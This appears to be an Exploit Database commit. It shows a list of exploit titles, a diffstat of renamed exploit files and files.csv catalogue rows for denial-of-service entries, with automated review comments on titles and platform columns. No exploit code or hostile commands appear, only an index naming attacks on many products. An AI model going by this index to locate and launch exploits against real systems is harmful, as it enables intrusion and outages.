'appendChild' Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow Microsoft Data Access Components - Overflow (PoC) (MS11-002) Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002) Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit) Veritas Backup Exec Name Service - Overflow (Metasploit) Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) Veritas Backup Exec Name Service - Remote Overflow (Metasploit) Microsoft Private Communications Transport - Overflow (MS04-011) (Metasploit) Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit) Microsoft RRAS Service - Overflow (MS06-025) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit) Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 
'SMB' (MS07-029) (Metasploit) Microsoft NetDDE Service - Overflow (MS04-031) (Metasploit) Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit) CA BrightStor Agent for Microsoft SQL - Overflow (Metasploit) CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit) CA BrightStor Universal Agent - Overflow (Metasploit) CA BrightStor Universal Agent - Remote Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit) Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit) Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit) freeFTPd 1.0 - 'Username' Overflow (Metasploit) freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit) War-FTPD 1.65 - 'Username' Overflow (Metasploit) War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit) Microsoft RPC DCOM Interface - Overflow (MS03-026) (Metasploit) Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit) MaxDB WebDBM - 'Database' Overflow (Metasploit) MaxDB WebDBM - 'Database' Remote Overflow (Metasploit) Savant Web Server 3.1 - Overflow (Metasploit) Savant Web Server 3.1 - Remote Overflow (Metasploit) McAfee ePolicy Orchestrator / ProtectionPilot - Overflow (Metasploit) McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit) Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit) Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (OSX) - Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (OSX) - Remote Overflow (Metasploit) Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (OSX/PPC) 
- 'trans2open' Remote Overflow (Metasploit) Samba 2.2.8 (BSD x86) - 'trans2open' Overflow (Metasploit) Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) Progea Movicon 11 - 'TCPUploadServer' Remote Progea Movicon 11 - 'TCPUploadServer' Remote File System Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit) Easy File Sharing HTTP Server 7.2 - Remote Overflow (SEH) (Metasploit) Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow JBoss AS 2.0 - Remote JBoss AS 2.0 - Remote Command Execution WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter) WorldMail IMAPd 3.0 - Remote Overflow (SEH) (Egghunter) HP Diagnostics Server - 'magentservice.exe' Overflow (Metasploit) HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit) Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Remote Overflow Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit) Apache Tomcat - Account Scanner / 'PUT' Request Remote Adobe Flash Player - '.mp4 cprt' Remote Overflow (Metasploit) Apache Tomcat - Account Scanner / 'PUT' Request Command Execution McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution IRIX 6.4 - 'pfdisplay.cgi' IRIX 6.4 - 'pfdisplay.cgi' Code Execution SGI IRIX 6.3 - cgi-bin 'webdist.cgi' SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Command Execution Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets' Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog' Remote Overflow ALLMediaServer 0.8 - Overflow (SEH) ALLMediaServer 0.8 - Remote Overflow (SEH) S.u.S.E. 
Linux 6.3/6.4 - Installed Package Disclosure SuSE Linux 6.3/6.4 - Installed Package Disclosure Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Remote File Upload Samhain Labs 1.x - HSFTP Remote Format String GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Remote Overflow IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit) IBM Cognos - 'tm1admsd.exe' Remote Overflow (Metasploit) Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray Plesk < 9.5.4 - Remote Plesk < 9.5.4 - Remote Command Execution Microsoft PowerPoint 2003 - 'powerpnt.exe' Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow HP LoadRunner - 'magentproc.exe' Overflow (Metasploit) HP LoadRunner - 'magentproc.exe' Remote Overflow (Metasploit) ImgSvr 0.6 - 'Template' Local File Inclusion Nginx 1.4.0 (Generic Linux x64) - Remote Nginx 1.4.0 (Generic Linux x64) - Remote Overflow Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit) Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit) Oracle 9i/10g Database - Network Foundation Remote Oracle 9i/10g Database - Network Foundation Remote Overflow Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection Yaws 1.55 - 'Logs' Terminal Escape Sequence Command Injection Plesk Server Administrator (PSA) - 'locale' Local File Inclusion VSAT Sailor 900 - Remote VSAT Sailor 900 - Remote Overflow Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH) Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH) TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit) Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote CCBILL CGI - 
'ccbillx.c' 'whereami.cgi' Remote Code Execution phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote PHP-Nuke 6.9 - 'cid' SQL Injection Remote phpBB 2.0.6 - 'search_id' SQL Injection / MD5 Hash PHP-Nuke 6.9 - 'cid' SQL Injection AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile' AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote phpBB - highlight Arbitrary File Upload 'Santy.A' PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Information Leak phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload e107 - 'include()' Remote e107 - 'include()' Remote File Upload phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm' phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista PostNuke PostWrap Module - Remote PostNuke PostWrap Module - Remote File Inclusion / Code Execution phpBB 2.0.13 - 'downloads.php' mod Remote phpBB 2.0.13 - 'Calendar Pro' mod Remote phpBB 2.0.13 - 'downloads.php' mod Get Hash phpBB 2.0.13 - 'Calendar Pro' mod Get Hash PhotoPost - Arbitrary Data Remote PhotoPost - Arbitrary Data Hash eXtropia Shopping Cart - 'web_store.cgi' Remote Mambo 4.5.2.1 - Fetch Password Hash Remote eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution Mambo 4.5.2.1 - Fetch Password Hash Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution vuBB 0.2 - 'cookie' Final SQL Injection 'mq=off' vuBB 0.2 Final - 'cookie' SQL Injection JiRos Banner Experience 1.0 - Create Authentication Bypass Remote JiRos Banner Experience 1.0 - Unauthorised Create Admin phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Sugar Suite Open Source 4.2 - 'OptimisticLock' Remote phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution DeluxeBB 1.06 - 'Attachment mod_mime' Remote DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution Drupal 4.7 - 'Attachment mod_mime' Remote 
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Local File Inclusion Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Command Execution phpBB 2.0.21 - Poison Null Byte Remote phpBB 2.0.21 - Poison Null Byte Remote File Upload PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()' PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Command Execution Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote Philex 0.2.3 - Remote File Inclusion / File Disclosure MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2) LoveCMS 1.6.2 Final - Update Settings Remote LoveCMS 1.6.2 Final - Update Settings addalink 4 Beta - Write Approved Links Remote addalink 4 Beta - Write Approved Links The Rat CMS Alpha 2 - 'download.php' Remote The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation Graugon Forum 1 - 'id' Command Injection 'via SQL Injection' Graugon Forum 1 - 'id' Command Injection / SQL Injection Coppermine Photo Gallery 1.4.22 - Remote Coppermine Photo Gallery 1.4.22 - SQL Injection Barracuda IMFirewall 620 - Barracuda IMFirewall 620 - Multiple Vulnerabilities Barracuda Web Firewall 660 Firmware 7.3.1.007 - Barracuda Web Firewall 660 Firmware 7.3.1.007 - Multiple Vulnerabilities CakePHP 1.3.5/1.2.8 - 'Unserialize()' CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution WordPress Plugin Akismet 2.1.3 - WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting ImgSvr 0.6 - 'Template' Local File Inclusion Plesk 
Server Administrator (PSA) - 'locale' Local File Inclusion Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting --- files.csv | 603 +++++++++--------- platforms/aix/{dos => local}/19045.txt | 0 platforms/hardware/dos/43164.py | 23 + platforms/hardware/webapps/43158.txt | 46 ++ platforms/irix/local/19273.sh | 11 +- platforms/irix/local/19310.c | 4 +- platforms/irix/local/19706.sh | 8 +- platforms/linux/{remote => dos}/38.pl | 0 platforms/linux/local/19254.c | 2 + platforms/linux/local/19565.sh | 11 +- platforms/linux/local/19900.c | 2 + platforms/linux/local/23154.c | 2 + platforms/linux/{remote => local}/405.c | 0 platforms/linux/{local => remote}/23740.c | 2 + platforms/linux/{remote => webapps}/30286.txt | 0 platforms/linux/{remote => webapps}/6026.pl | 0 platforms/multiple/dos/43166.js | 213 +++++++ platforms/multiple/dos/43167.js | 210 ++++++ platforms/multiple/dos/43168.js | 218 +++++++ platforms/multiple/dos/43169.js | 164 +++++ platforms/multiple/dos/43170.js | 178 ++++++ platforms/multiple/dos/43171.js | 149 +++++ platforms/multiple/dos/43172.js | 152 +++++ platforms/multiple/dos/43173.html | 162 +++++ platforms/multiple/dos/43174.html | 168 +++++ platforms/multiple/dos/43175.html | 214 +++++++ platforms/multiple/dos/43176.html | 194 ++++++ platforms/multiple/local/19498.sh | 11 +- .../multiple/{remote => webapps}/34136.txt | 0 platforms/osx/local/29950.js | 2 - platforms/osx/{remote => local}/758.c | 0 platforms/osx/remote/1265.pl | 1 + platforms/php/webapps/2348.pl | 2 +- platforms/php/webapps/30036.html | 5 +- platforms/sco/local/23141.sh | 8 +- platforms/solaris/{local => dos}/15245.txt | 0 platforms/solaris/{local => dos}/19161.txt | 0 platforms/windows/{local => dos}/403.c | 0 platforms/windows/{remote => dos}/9815.py | 0 platforms/windows/{remote => dos}/9817.py | 0 platforms/windows/{dos => local}/11987.txt | 0 platforms/windows/local/12012.txt | 3 +- platforms/windows/local/19220.c | 2 + platforms/windows/{remote => local}/2821.c | 0 
platforms/windows/remote/11420.py | 3 +- platforms/windows/remote/17977.txt | 3 +- platforms/windows/remote/20459.html | 2 + platforms/windows/remote/28225.c | 6 +- 48 files changed, 2452 insertions(+), 332 deletions(-) rename platforms/aix/{dos => local}/19045.txt (100%) create mode 100755 platforms/hardware/dos/43164.py create mode 100644 platforms/hardware/webapps/43158.txt rename platforms/linux/{remote => dos}/38.pl (100%) rename platforms/linux/{remote => local}/405.c (100%) rename platforms/linux/{local => remote}/23740.c (96%) rename platforms/linux/{remote => webapps}/30286.txt (100%) rename platforms/linux/{remote => webapps}/6026.pl (100%) create mode 100644 platforms/multiple/dos/43166.js create mode 100644 platforms/multiple/dos/43167.js create mode 100644 platforms/multiple/dos/43168.js create mode 100644 platforms/multiple/dos/43169.js create mode 100644 platforms/multiple/dos/43170.js create mode 100644 platforms/multiple/dos/43171.js create mode 100644 platforms/multiple/dos/43172.js create mode 100644 platforms/multiple/dos/43173.html create mode 100644 platforms/multiple/dos/43174.html create mode 100644 platforms/multiple/dos/43175.html create mode 100644 platforms/multiple/dos/43176.html rename platforms/multiple/{remote => webapps}/34136.txt (100%) rename platforms/osx/{remote => local}/758.c (100%) rename platforms/solaris/{local => dos}/15245.txt (100%) rename platforms/solaris/{local => dos}/19161.txt (100%) rename platforms/windows/{local => dos}/403.c (100%) rename platforms/windows/{remote => dos}/9815.py (100%) rename platforms/windows/{remote => dos}/9817.py (100%) rename platforms/windows/{dos => local}/11987.txt (100%) rename platforms/windows/{remote => local}/2821.c (100%) diff --git a/files.csv b/files.csv index 07919e4c8..1487663ab 100644 --- a/files.csv +++ b/files.csv 
@@ -6,6 +6,7 @@ id,file,description,date,author,platform,type,port 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service (PoC)",2003-04-29,aT4r,windows,dos,0 35,platforms/windows/dos/35.c,"Microsoft IIS 5.0 < 5.1 - Remote Denial of Service",2003-05-31,Shachank,windows,dos,0 +38,platforms/linux/dos/38.pl,"Apache 2.0.45 - 'APR' Crash",2003-06-08,"Matthew Murphy",linux,dos,80 59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service",2003-07-21,Flashsky,windows,dos,0 @@ -64,6 +65,7 @@ id,file,description,date,author,platform,type,port 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",multiple,dos,31337 385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 +403,platforms/windows/dos/403.c,"IPD (Integrity Protection Driver) - Denial of Service",2004-08-18,anonymous,windows,dos,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server - Multiple Connections Denial of Service Vulnerabilities",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service",2004-08-27,"Luigi Auriemma",windows,dos,0 
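Review bot: in the @@ -6,6 +6,7 @@ hunk the new row `+38,platforms/linux/dos/38.pl,"Apache 2.0.45 - 'APR' Crash",...,linux,dos,80` carries no vulnerability class in its title, while the rows this commit moves into or retitles within dos elsewhere get a "(Denial of Service)" suffix (37346, 42470, 42744); retitle it "Apache 2.0.45 - 'APR' Crash (Denial of Service)", or "(PoC)" as the neighbouring 22 row does. The diffstat lists this file as `rename platforms/linux/{remote => dos}/38.pl (100%)`, so the matching `-38,platforms/linux/remote/38.pl,...` removal has to appear in the remote section of this same files.csv diff; without it the id 38 would be present twice.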
@@ -654,7 +656,7 @@ id,file,description,date,author,platform,type,port 4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,multiple,dos,0 4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",windows,dos,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos,0 -4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 +4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 - DHCPd Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos,0 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - 'Alter' Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 
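Review bot: the retitled 4601 row keeps `multiple` in its platform column and stays under platforms/multiple/dos/, yet both the old title and the new "Ubuntu 6.06 - DHCPd Remote Denial of Service" name one distribution release. Either the DHCPd crash is generic, in which case the title should not lead with Ubuntu 6.06, or it is distribution-specific and the row (and the file) belong under linux; the hunk only moves the hyphen and leaves that mismatch as it was.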
@@ -1222,6 +1224,8 @@ id,file,description,date,author,platform,type,port 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,windows,dos,0 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21 9814,platforms/windows/dos/9814.py,"CDBurnerXP 4.2.4.1351 - Local Crash (Denial of Service)",2009-09-25,Dr_IDE,windows,dos,0 +9815,platforms/windows/dos/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,dos,0 +9817,platforms/windows/dos/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,dos,0 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 
@@ -1462,7 +1466,6 @@ id,file,description,date,author,platform,type,port 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 -11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 @@ -1748,6 +1751,7 @@ id,file,description,date,author,platform,type,port 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0 15242,platforms/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0 15243,platforms/windows/dos/15243.html,"Oracle Java - APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0 +15245,platforms/solaris/dos/15245.txt,"Oracle Solaris - 'su' Crash",2010-10-13,prdelka,solaris,dos,0 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos,0 15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",windows,dos,0 
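Review bot: the @@ -1462,7 +1466,6 @@ hunk removes `11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0`, which the diffstat records as the dos-to-local rename of 11987.txt. The re-added row in the local section therefore needs `platforms/windows/local/11987.txt` and `local` in the type column, and because the category changes, the title should state the class of issue: "Escape From '.PDF'" alone does not tell a reader whether to expect a crash or code execution, whereas the other rows retitled in this commit (106, 118, 19250) do get a class appended.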
@@ -2223,7 +2227,6 @@ id,file,description,date,author,platform,type,port 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 -19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",hardware,dos,0 
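Review bot: the row removed here, `-19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0`, is a SunOS entry filed under the `aix` platform, and the diffstat shows the file moving only from aix/dos to aix/local. Since the row is being rewritten anyway, fix the platform at the same time: the 19161 row added in the next hunk files a Solaris 2.5.1 issue under `solaris`, so 19045 should become `platforms/solaris/local/19045.txt` with `solaris` in the platform column. The neighbouring context rows 19046 (AppleShare IP Mail Server) and 19049 (BSDI 4.0) are mis-filed under aix in the same way, so this is a regional problem worth a follow-up rather than a one-off.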
@@ -2241,6 +2244,7 @@ id,file,description,date,author,platform,type,port 19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19161,platforms/solaris/dos/19161.txt,"Solaris 2.5.1 - 'Ping' System Panic (Denial of Service)",1997-06-15,"Adam Caldwell",solaris,dos,0 19181,platforms/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19182,platforms/windows/dos/19182.txt,"XnView - '.ECW' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19183,platforms/windows/dos/19183.txt,"XnView - '.FlashPix' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 
@@ -2253,8 +2257,8 @@ id,file,description,date,author,platform,type,port 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - Denial of Service Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos,0 -19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 -19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0/2.1/2.2 - 'autofs'",1999-02-19,"Brian Jones",linux,dos,0 +19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / SuSE Linux 6.1) - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 +19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service",1999-02-19,"Brian Jones",linux,dos,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - '.m3u' Crash (PoC)",2012-06-18,0dem,windows,dos,0 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service)",1999-01-26,"Dan Burcaw",linux,dos,0 
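Review bot: within the @@ -2253,8 +2257,8 @@ hunk the two rewritten rows are not treated alike: 19250 gains a class suffix ("Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service") while 19241 only has its SuSE spelling normalised and is left as "... SuSE Linux 6.1) - IP Options", which names a feature rather than a vulnerability. Give 19241 the same treatment, e.g. "... - IP Options Denial of Service", so both dos rows in the hunk read the same way.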
@@ -2298,7 +2302,7 @@ id,file,description,date,author,platform,type,port 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service",1999-08-11,"Nobuo Miwa",multiple,dos,0 -19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,linux,dos,0 +19463,platforms/linux/dos/19463.c,"SuSE Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,linux,dos,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos,0 